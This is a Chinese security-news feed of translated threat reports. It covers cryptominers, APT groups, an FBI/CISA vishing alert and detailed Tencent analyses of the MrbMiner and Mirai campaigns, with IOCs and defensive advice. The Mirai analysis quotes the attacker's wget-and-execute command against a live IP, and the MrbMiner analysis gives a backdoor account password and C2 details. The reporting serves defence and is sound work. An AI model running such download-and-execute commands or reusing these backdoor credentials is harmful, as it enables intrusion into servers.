分类: 威胁情报

KryptoCibule:多任务多货币密码窃取

前言 ESET研究人员发现了迄今未记录的恶意软件家族,我们将其命名为KryptoCibule。对加密货币而言,这种恶意软件具有三重威胁。它利用受害者的资源来挖掘硬币,试图通过替换剪贴板中的钱包地址来劫持交易,并泄漏与加密货币相关的文件,同时部署多种技术来避免检测。KryptoCibule在其通信基础架构中广泛使用了Tor网络和BitTorrent协议。 该恶意软件用C编写,还使用了一些合法软件。有些东西,例如Tor和Transmission torrent客户端,与安装程序捆绑在一起。其他的则在运行时下载,包括Apache httpd和Buru SFTP服务器。图1显示了各种组件及其相互作用的概述。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1326/ 消息与封面来源:welivesecurity   ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

跨平台挖矿木马 MrbMiner 已控制上千台服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/oq3z6rUcPfmMi0-KHQ3wwQ 一、背景 腾讯安全威胁情报中心检测到新型挖矿木马家族MrbMiner,黑客通过SQL Server服务器弱口令爆破入侵,爆破成功后在目标系统释放C#语言编写的木马assm.exe,进一步通过该木马与C2服务器通信,然后下载门罗币挖矿木马并维持挖矿进程。挖矿木马文件通过ZIP解压缩得到,并且会伪装成各类Windows系统服务。由于该挖矿木马的C2地址、矿池账号和文件信息均包含特征字符“MRB”,腾讯安全威胁情报中心将其命名为“MrbMiner“。 MrbMiner入侵后会释放另外两个下载器installerservice.exe、PowerShellInstaller.exe,下载器会将挖矿木马安装为系统服务以实现持久化运行,同时会搜集中招系统信息(包括CPU型号、CPU数量、.NET版本信息),关闭Windows升级服务以及在Windows系统中添加后门账号以方便继续入侵控制。 MrbMiner挖矿木马会小心隐藏自身,避免被管理员发现。木马会监测任务管理器进程,当用户启动“任务管理器”进程查看系统时,挖矿进程会立刻退出,并删除相关文件。 腾讯安全专家在MrbMiner挖矿木马的FTP服务器上还发现了基于Linux系统和ARM系统的挖矿木马文件,推测MrbMiner已具备跨平台攻击能力。根据目前掌握的威胁情报数据,MrbMiner挖矿木马已控制上千台服务器组网挖矿。 腾讯安全系列产品已支持检测、清除MrbMiner挖矿木马,详细响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)MrbMiner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)MrbMiner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)MrbMiner挖矿木马关联的IOCs已支持识别检测; 2)SQL Server弱口令爆破登陆预警。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀MrbMiner相关木马程序; 2)SQL Server弱口令爆破登陆预警。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测MrbMiner挖矿木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀MrbMiner入侵释放的木马程序。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 黑客通过批量扫描和爆破SQL Server服务,执行shellcode下载assm.exe到服务器一下位置,并启动assm.exe: c:/program files/microsoft sql server/mssql**.mssqlserver/mssql/data/sqlmanagement/assm.exe c:/windows/temp/sqlmanagement/assm.exe assm.exe采用C#编写,执行后首先杀死已有挖矿进程,并删除文件。 然后向服务器vihansoft.ir:3341发送上线信息“    StartProgram    ok”。 从服务器mrbfile[.]xyz下载门罗币挖矿木马压缩包文件sqlServer.dll。 对下载得到的文件进行Zip解压缩。 挖矿木马文件名伪装成与Windows正常服务相似的文件名: Microsoft Media Service.exe Microsoft Agent System.exe WindowsSecurityService.exe WindowsAgentService.exe WindowsHostService.exe Windows Desktop Service.exe Windows Host Management.exe Windows Update Service.exe SecurityService.exe InstallWindowsHost.exe SystemManagement.exe 文件描述也使用类似的伪装手法: Services Service-Mrb WindowsSecurityService MrbMngService SetAllconfig()设置挖矿配置文件,首先向服务器发送消息“getConfig”获取配置文件,然后将得到的配置文件中的“rig-id”由“MRB_ADMIN”替换为“MrbAdmin-ProcessorCount”,ProcessorCount为当前机器CPU数量。 同时根据环境下不同的CPU数量设置不同的挖矿端口,默认端口为3333: CPU:1,port:3331 CPU:2,port:3332 CPU:4,port:3334 CPU:8,port:3338 默认挖矿配置参数: 一旦检测到挖矿进程退出,则重新启动。 一旦检测到“taskmgr”进程存在,则退出挖矿进程,并删除相关文件。(非常狡猾的设计,如果用户发现系统异常,准备打开任务管理器检查时,挖矿进程就结束,并删除文件) 私有矿池:mrbpool.xyz:443 公有矿池:pool.supportxmr.com:3333 门罗币钱包: 49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 目前该钱包的收益为7个XMR,其私有矿池收益无法查询,而挖矿木马收益主要来源于私有矿池,因此该挖矿木马的实际收益会远远超过当前数额。 分析发现,黑客入侵后释放的另外两个下载器installerservice.exe、PowerShellInstaller.exe,下载门罗币挖矿木马之后,还会将其安装服务进行持久化,服务名为”Microsoft Agent Service”、”Windows Host Service”。 添加Windows账号”Default”,密码:”@fg125kjnhn987″,以便后续入侵系统。 执行Powershell命令,关闭系统升级服务: 获取系统内存信息: 获取IP地址: 获取CPU名称: 获取CPU数量: 获取.NET Framework版本信息: 此外,腾讯安全专家在攻击者的FTP服务器ftp[:]//145.239.225.15上,还发现了基于Linux平台和ARM平台的挖矿木马: Linux和ARM平台挖矿使用矿池:pool.supportxmr.com:80 钱包: 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh 该钱包目前收益3.38个XMR。 IOCs IP 145.239.225.15 145.239.225.18 Domain mrbfile.xyz vihansoft.ir C&C vihansoft.ir:3341 URL http[:]//mrbfile.xyz/Hostz.zip http[:]//mrbfile.xyz/PowerShellInstaller.exe http[:]//mrbfile.xyz/sql/SqlServer.dll http[:]//mrbfile.xyz/Agentz.zip http[:]//mrbfile.xyz/Agenty.zip http[:]//mrbfile.xyz/sql/syslib.dll http[:]//mrbfile.xyz/sys.dll http[:]//mrbfile.xyz/35/sys.dll http[:]//mrbfile.xyz/Hosty.zip http[:]//vihansoft.ir/sys.dll https[:]//vihansoft.ir/Sys.dll http[:]//vihansoft.ir/Agentx.zip https[:]//vihansoft.ir/d.zip http[:]//vihansoft.ir/k.exe http[:]//vihansoft.ir/d.zip https[:]//vihansoft.ir/Hostx.zip http[:]//vihansoft.ir/p.zip https[:]//vihansoft.ir/k.exe https[:]//vihansoft.ir/Agentx.zip https[:]//vihansoft.ir/vhost.tar.gz https[:]//vihansoft.ir/P.zip https[:]//github.com/farzadbehdad/poiuytrewq/blob/master/Sys.dll?raw=true https[:]//vihanSoft.ir/Agent.zip https[:]//vihanSoft.ir/host.zip ftp[:]//145.239.225.15/armv.tar.gz ftp[:]//145.239.225.15/linux-os.tar.gz ftp[:]//145.239.225.15/linuxservice.tar.gz ftp[:]//145.239.225.15/osx.tar.gz ftp[:]//145.239.225.15/vhost.tar.gz ftp[:]//145.239.225.15/xmr.tar.gz ftp[:]//145.239.225.15/arm.tar.gz Md5 c79d08c7a122f208edefdc3bea807d64 6bcc710ba30f233000dcf6e0df2b4e91 ac72e18ad3d55592340d7b6c90732a2e 6c929565185c42e2e635a09e7e18fcc8 04612ddd71bb11069dd804048ef63ebf 68206d23f963e61814e9a0bd18a6ceaa a5adecd40a98d67027af348b1eee4c45 c417197bcd1de05c8f6fcdbfeb6028eb 76c266d1b1406e8a5e45cfe279d5da6a 605b858b0b16d4952b2a24af3f9e8c8e c3b16228717983e1548570848d51a23b c10b1c31cf7f1fcf1aa7c79a5529381c 391694fe38d9fb229e158d2731c8ad7c 5d457156ea13de71c4eca7c46207890d f1cd388489270031e659c89233f78ce9 54b14b1aa92f8c7e33a1fa75dc9ba63d f9e91a21d4f400957a8ae7776954bd17 61a17390c68ec9e745339c1287206fdb f13540e6e874b759cc3b51b531149003 2915f1f58ea658172472b011667053df 3cb03c04a402a57ef7bb61c899577ba4 f2d0b646b96cba582d53b788a32f6db2 5eaa3c2b187a4fa71718be57b0e704c9 8cf543527e0af3b0ec11f4a5b5970810 36254048a516eda1a13fab81b6123119 0a8aac558c77f9f49b64818d7ab12000 59beb43a9319cbc2b3f3c59303989111 ce8fdec586e258ef340428025e4e44fa e4284f80b9066adc55079e8e564f448c 2f402cde33437d335f312a98b366c3c8 25a579dcc0cd6a70a56c7a4a0b8a1198 2d1159d7dc145192e55cd05a13408e9b 2dd8a0213893a26f69e6ae56d2b58d9d 0d8838116a25b6987bf83214c1058aad 0c883e5bbbbb01c4b32121cfa876d9d6 2d26ecc1fdcdad62e608a9de2542a1a6 27c91887f44bd92fb5538bc249d0e024 96b0f85c37c1523f054c269131755808 028f24eb796b1bb20b85c7c708efa497 门罗币钱包: 49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh

Cetus:针对 Docker daemons 的加密劫持蠕虫

摘要 自容器诞生以来,安全专家就将不安全的Docker daemons 称为主要威胁。我们最近还撰写了有关Graboid(第一个Docker密码劫持蠕虫和不安全的Docker daemons)的文章。我通过设置Docker daemons蜜罐进行了进一步的研究,以研究在野外寻找普通Docker daemons的情况,并了解由COVID-19导致的向云的转移是否增加了针对性云攻击的普及率和复杂性。 本文将详细介绍Cetus的发现,Cetus是针对Monero的一种新的和改进的Docker密码劫持蠕虫挖掘,可在我们创建的Docker daemons蜜罐中找到。 蜜罐 为了进行研究,我设置了受限的Docker daemons,并记录了5月份的所有流量。在这段时间里,我目睹了各种各样的攻击,从僵尸网络到蠕虫,一切都在进行,其中大多数是为了进行加密劫持,特别是对门罗币。 最常见的攻击之一引起了我的注意,因为它具有蠕虫的潜在特征。与其他攻击不同,蜜罐在这里受到来自许多不同的不安全Docker daemons实例的攻击。根据我的honeypot部署和其他有关容器安全性的研究项目,看到蠕虫针对不安全的Docker daemons的情况并不常见。我分析有效负载,并确定这是一个新的Docker蠕虫:恶意软件的每个实例都试图发现和感染本地网络和外部的其他Docker daemons实例。 Cetus如何运作     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1322/ 消息与封面来源:paloalto ,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

柠檬鸭加密矿工:针对云应用和 Linux

企业一直是恶意加密矿工团队的首选目标。他们不仅经常操作大量的计算资源(这有助于密码劫持者更快地开采加密货币),而且企业运营的网络对随后的攻击也很有帮助:犯罪分子可能会使用最初的受感染机器作为立足点,从中试图横向移动。在网络中感染更多计算机,并通过新的漏洞和社交工程技术不断调整攻击 “柠檬鸭”(Lemon_Duck)是一个我们见过的十分先进的密码劫持者。它的创建者不断使用新的威胁向量和混淆技术来更新代码,以逃避检测,并且矿工本身是“无文件的”,这意味着它驻留在内存中,并且不会在受害者的文件系统上留下任何痕迹。 在这篇文章中,我分享了有关此活动使用新攻击媒介的信息,以及我在上一则文章中讨论的其余媒介的一些后续工作。 以Covid-19为主题的电子邮件和附件 一些传播垃圾邮件的攻击者通常从重大事件中获利,例如年末假期,各个国家/地区的报税截止日期。因此,柠檬鸭背后的威胁者与许多其他威胁者一样,在大规模垃圾邮件活动中利用了全球对COVID-19大流行的忧虑,使收件人收到恶意附件。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1314/ 消息与封面来源:Sophos   ,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

以法律和金融组织为目标的 DeathStalker APT

国家赞助的威胁者和复杂的攻击经常成为人们关注的焦点。确实,他们的创新技术,先进的恶意软件平台和 0day漏洞利用链吸引了我们的想象力。但是,在大多数公司中,这些群体仍然不太可能成为风险模型的一部分,也不应该成为风险模型的一部分。当今的企业面临着更多直接的威胁,从勒索软件和客户信息泄漏到从事不道德商业行为的竞争对手。在此博客文章中,我们将重点关注DeathStalker:这是一个独特的威胁组,似乎针对律师事务所和金融部门的公司(尽管我们偶尔在其他垂直行业也看到过)。据我们所知,他们不受经济利益的驱使。他们不部署勒索软件,不窃取付款信息并转售,或从事与网络犯罪黑社会相关的任何类型的活动。他们对收集敏感的业务信息感兴趣,这使我们相信DeathStalker是一群雇佣兵,他们提供黑客出租服务,或在金融界充当某种信息经纪人的角色。 DeathStalker首先通过Powersing的基于PowerShell的植入程序引起了我们的注意。通过分解该线程,我们可以确定可追溯到2018年甚至2012年的活动。但是,在深入探究DeathStalker的历史之前,我们将从一些背景开始,以下先介绍威胁者的武器库。   … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1312/ 消息与封面来源:SUCURELIST,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

透明部落黑客组织进化分析

背景和主要发现 透明部落(又称PROJECTM和MYTHIC LEOPARD)是一个活动频繁的组织,其活动可以追溯到2013年。Proofpoint 在2016年发表了一篇有关他们的很好的文章,从那时起,我们一直关注着。我们已经通过APT威胁情报报告了他们的活动,在过去的四年中,这个APT小组从未休假。他们的目标通常是印度军方和政府人员。 多年来,该小组TTP一直保持一致,不断使用某些工具并为特定的活动创建新的程序。他们最喜欢的感染媒介是带有嵌入式宏的恶意文档,这些文档似乎是由自定义生成器生成的。 他们的主要恶意软件是自定义的.NET RAT,俗称Crimson RAT,但多年来,我们还观察到了其他自定义.NET恶意软件和基于Python的RAT Peppy的使用。 在过去的一年中,我们看到该组织加强了其活动,开始了大规模的感染运动,开发了新的工具并加强了对阿富汗的关注。 我们最近的调查将在两个博客文章中进行介绍。第一部分将涵盖以下关键点: 我们发现了Crimson Server组件,这是Transparent Tribe用来管理受感染机器和进行间谍活动的C2。该工具证实了我们对Crimson RAT的大多数观察结果,并帮助我们了解了攻击者的观点。 透明部落继续传播深红RAT,感染了多个国家(主要是印度和阿富汗)的受害者。 USBWorm组件是真实的,并且已在数百个系统上检测到它。这种恶意软件的存在早在几年前就已被推测出来,但是据我们所知,它从未被公开描述过。     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1305/ 消息与封面来源:SUCURELIST,译者:叶绿体 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。    

FBI、CISA 对企业虚拟专有网访问凭据攻击“Vishing”带来的威胁发出警告

美国联邦调查局(FBI)和网络安全与基础设施安全局(CISA)周四发布联合预警,警告针对公司的语音钓鱼或 “vishing “攻击的威胁越来越大。在发布深入研究一个提供服务的犯罪集团后不到24小时,KrebsOnSecurity就发表了一篇文章,该集团提供的服务是人们可以在COVID-19大流行期间雇用他们从远程工作的员工那里窃取VPN凭证和其他敏感数据。 “COVID-19大流行导致大规模转向在家工作,导致企业虚拟专用网络(VPN)的使用增加,在2020年7月中旬,网络犯罪分子开始了一场名为vishing的活动–以无差别获得多家公司员工工具的访问权–最终目标是将访问权货币化。” 正如周三的报道所指出的那样,这些机构表示,攻击者设置的钓鱼网站往往连字符、目标公司的名称和某些词语都非常具有指向性–如 “支持”、”票据 “和 “员工”。作案者专注于对目标公司的新员工进行社会工程,并冒充目标公司IT服务台的工作人员。 FBI/CISA的联合警报称,vishing团伙还利用社交媒体平台上的公共档案、招聘人员和营销工具、公开的背景调查服务以及开源研究,大规模搜刮特定公司的员工档案。从警报中可以看出。 “作案者先是使用未经归属的网络电话(VoIP)号码 拨打目标员工的个人手机,随后开始结合其他办公室和受害者公司员工的虚假号码。行为人使用社会工程技术,在某些情况下,冒充受害者公司IT服务台的成员,利用他们对员工个人身份信息的了解–包括姓名、职位、在公司的时间和家庭住址–来获得目标员工的信任。” “然后,行为人说服目标员工将发送一个新的VPN链接,并要求他们登录,包括任何2FA[双因素认证]或OTP[一次性密码]的安全凭据也一并通过这种方法获取,随后他们记录员工提供的信息,并实时使用该员工的账户访问企业工具。” 警报指出,在某些情况下,毫无戒备的员工批准了2FA或OTP提示,或者是意外地批准了。除此之外,攻击者能够通过针对员工的SIM卡交换来拦截一次性代码,这涉及到移动电话公司的社会工程人员,让他们控制目标的电话号码。 这些机构表示,骗子利用被盗用的VPN凭证在受害者公司数据库中挖掘客户的个人信息,以便在其他攻击中加以利用。 “然后,行为人利用员工的访问权限对受害者进行进一步的研究,和/或使用取决于被访问的平台的不同方法来欺诈性地获得资金,”警报中写道。”货币化方法根据公司的不同而不同,但具有高度的侵略性,在最初的违规行为和破坏性的兑现计划之间有一个紧凑的时间表。” 该警告包括一些公司可以实施的建议,以帮助减轻这些vishing攻击的威胁,包括。 – 限制VPN连接仅用于受管理设备,使用硬件检查或安装证书等机制,因此仅靠用户输入不足以访问企业VPN。 – 在适用的情况下,限制VPN的访问时间,以减轻允许时间以外的访问。 – 采用域名监控,跟踪企业、品牌域名的创建或变更。 – 积极扫描和监控网络应用,以防止未经授权的访问、修改和异常活动。 – 采用最低权限原则,实施软件限制政策或其他控制措施;监控授权用户的访问和使用。 – 考虑对通过公共电话网络进行的员工与员工之间的通信采用正式的认证程序,并在其中使用第二种因素,以在讨论敏感信息之前,对电话进行认证。 – 改进2FA和OTP信息传递,以减少员工认证尝试的混乱。 – 确认网络链接没有拼写错误或包含错误的域名。 – 将正确的企业VPN URL加入书签,不要仅凭呼入的电话访问其他URL。 – 对自称来自合法组织的不明身份者的主动电话、访问或电子邮件信息要保持警惕。不要提供个人信息或有关您的组织的信息,包括其组织结构、组织结构和组织结构。     (稿源:cnBeta,封面源自网络。)

Mirai 僵尸网络利用弱口令爆破攻击上万台 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw     腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 一、概述 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 Mirai是一个大型僵尸网络,主要通过SSH和telnet弱口令进行感染,攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器,控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据,Mirai僵尸网络已在全国造成上万台设备感染,其中感染最多的为广东、上海和北京。 腾讯安全专家建议企业linux管理员避免使用弱口令,关闭非必须启用的端口,以防御黑客利用弱口令爆破的方式远程入侵,腾讯安全系列产品也针对Mirai僵尸网络的技术特点进行响应,清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mirai僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mirai僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Mirai僵尸网络关联的IOCs已支持识别检测; 2)告警弱口令爆破行为。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Mirai僵尸网络相关木马程序; 2)告警弱口令爆破行为。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Mirai僵尸网络木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 攻击者通过SSH(22端口)弱口令爆破进行远程攻击,攻击成功后执行如下shellcode: cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行,reportandyougaybins.sh脚本内容如下: reportandyougaybins.sh主要功能为下载和执行二进制木马程序,会分别从以下地址下载基于多个架构体系的样本,其中i586、i686、x86可感染基于Intel处理器的Linux服务器: http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerpc http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l 以i586为例进行分析,该样本的主要功能为与C&C地址通信,接收远程命令对目标发起DDOS攻击。在IOT设备中,通常会有看门狗(watchdog)进程,不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能,如果未成功关闭,则进入循环不断向其发送保活指令0x80045705。 将木马进程名替换为”/usr/sbin/dropbear”或者”sshd”隐藏自身。 从/proc/net/route中获取本机IP。 初始化table,并将后续要使用的数据添加到table中。 然后table_retrieve_val从table中取出数据,table_lock_val和table_unlock_val分别为加密和解密数据,解密函数在toggle_obf()中实现,解密方法是将数据与table_key进行循环异或,其中table_key=0xDEDEFFBA。 解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串“arch xxx”,xxx为设备平台类型。 Mirai与C&C服务器通信TCP流: 获取C&C服务器返回的数据后,进入processCmd处理接收到的命令。 Mirai可根据命令向目标发起以下类型的DDoS攻击:”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。 HTTP攻击: UDP攻击: TCP攻击: SYN攻击: ACK攻击: IOCs IP 193.228.91.123 194.180.224.103 45.95.168.138 45.95.168.190 37.49.224.87 193.228.91.124 185.172.110.185 C&C 194.180.224.103:3982 MD5 649a06f5159fc4e8ee269a9e0e1fd095 8bb40eb446abb7472cb3a892fd2450b4 3f3f8184219514d5834df94f362c74bc ef3b89e44a3a4973575a876ee5105cec 34033f561d196495e5c4780327acca0a 6f637a4ccfd00d9c2e08ecb84ce0b987 03ff0f5521631db7fa0d7990b5b4c19e 91c0f5304438a42ae5f28c8c0ff15954 536accde3643cb8294dd671ae5bdb3a2 9789917095d92cfe507e5fc2266667a1 8bafcd3d57dc597af4b6cb497cf0a0de 7e8e28631962dd5d52cbd93e50e7916e 7bfd106fe9d41c658f3be934346d3ff6 f0d5b7e31b4308c5ec326de9304bd3f4 bd1db394d52b950eed972eae93b80469 8b49a58a0bcb93afe72f1e3c1d800515 97a3699b819496892788b5c7a24be868 990fe40e991b9813a4f73b115ba160cb 2c0cc3d82871cfc05d38ea0a04f7f80a 26c56b011a494886e758d12fc07f6951 6e6d56669554c492ec4b1a9abd23e35b 64e5195e9cde652de6b2623d2d3e098d 1eeee50672a42dc2e55c6d4126afaf26 f6bbcf50aeda03aab1b5bc21b3df3e99 8e7d3e4bedf9bc3ed8a67890edc36590 556bd1d4d93abf19b4075d12ffef02a8 0d5302aa5491b3944566a212ca205923 ef72d6cc859438142a166f1d3ea4d462 193f92152f483aeb7ebe6d42855d9f27 1de00b44ef800a9d878de591fc43b854 b6e5bfb4b2f75d828022b84a247e99f2 039f379f3a36b4ab982a5ada7ceea078 51547b23165bc6f205ec3625840f3800 92137cf8ff782e15995919ebaa658474 94e027f4d33900f116bcf176aba726de aefe0411bd89a9b97c1741b75c9f7d71 d15256b7a475f8934daf79364b0885a1 c624ed18ad756aa6f41a70fe90102d78 5ff2fc4de3a059b504e09b7b1663ac1f fe6d19da030b1d299c35e89639d567bd 24a2659c72a980997161950926063b84 51b2190aa408ae08c6c9bf8dc8acc6e0 ecd696438914cc3c60dbf6de0df48f87 b45af2197eb3d12a199a40a048a36db6 32ef86b0358793f7ceffe1822bbf70e1 60fd7ed2e1ad0d41875d761b899766c4 0970f7f309bc678b0117d600e3f80f5f a1dc1c62dba56af6a8b25767074d691d 1cca73d23c7e50f4111815e840bd8960 42c87649e776dd73aa06033f9b8b750e 08dc3f3c77161e1cc349d91263f76b8c 61915eb8d8742fea42d3683c7255945a 000466d4c6c06398042851a7c049f6b6 0be41e0b52c51ab4ad966513455550b1 6290db15f07f6ebb114824b912a10129 fe19b99077ef4fe492107e4a9b943094 9068c1c69ab5c6ba80f01bab1a1a2ad4 8bb40eb446abb7472cb3a892fd2450b4 2b8796693b5f578c40611e5221fb4788 9f71d8839d89f7bed716bb3f509eb22f 47f12cf0806d2875c592a7d15e266ee6 8ee73860cfe02ca529671c060c18cf00 9e91347c4d8afad598d21e446f967fb2 71d2dc0728e710e4f939c97e88929930 672380fd4c58302e1c48a45e75c580d7 143f7de27921db16b08cea70bb3bef7b 63db9805775b20dae4c0f06e03585446 4a751ef5ef5e48cfef33bd29e2a4a5b7 00bf4ee5a64971260683e047719c0dd8 028b7629ff410f429ba65db1f6779226 URL http[:]//193.228.91.123/ares.sh http[:]//193.228.91.123/arm7 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/33bi/Ares.ppc http[:]//193.228.91.123/33bi/Ares.arm6 http[:]//193.228.91.123/33bi/ares.armebv7 http[:]//193.228.91.123/33bi/ares.mips http[:]//193.228.91.123/33bi/Ares.m68k http[:]//193.228.91.123/33bi/ares.mpsl http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh http[:]//193.228.91.123/reportandyougaybins.sh http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerp http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l http[:]//194.180.224.103/mips http[:]//194.180.224.103/mipsel http[:]//194.180.224.103/sh4 http[:]//194.180.224.103/x86 http[:]//194.180.224.103/armv6l http[:]//194.180.224.103/i686 http[:]//194.180.224.103/powerpc http[:]//194.180.224.103/i586 http[:]//194.180.224.103/m68k http[:]//194.180.224.103/sparc http[:]//194.180.224.103/armv4l http[:]//194.180.224.103/armv5l 参考链接: https://www.freebuf.com/articles/terminal/117927.html http://blog.nsfocus.net/mirai-source-analysis-report/

PurpleWave:来自俄罗斯的信息窃取程序

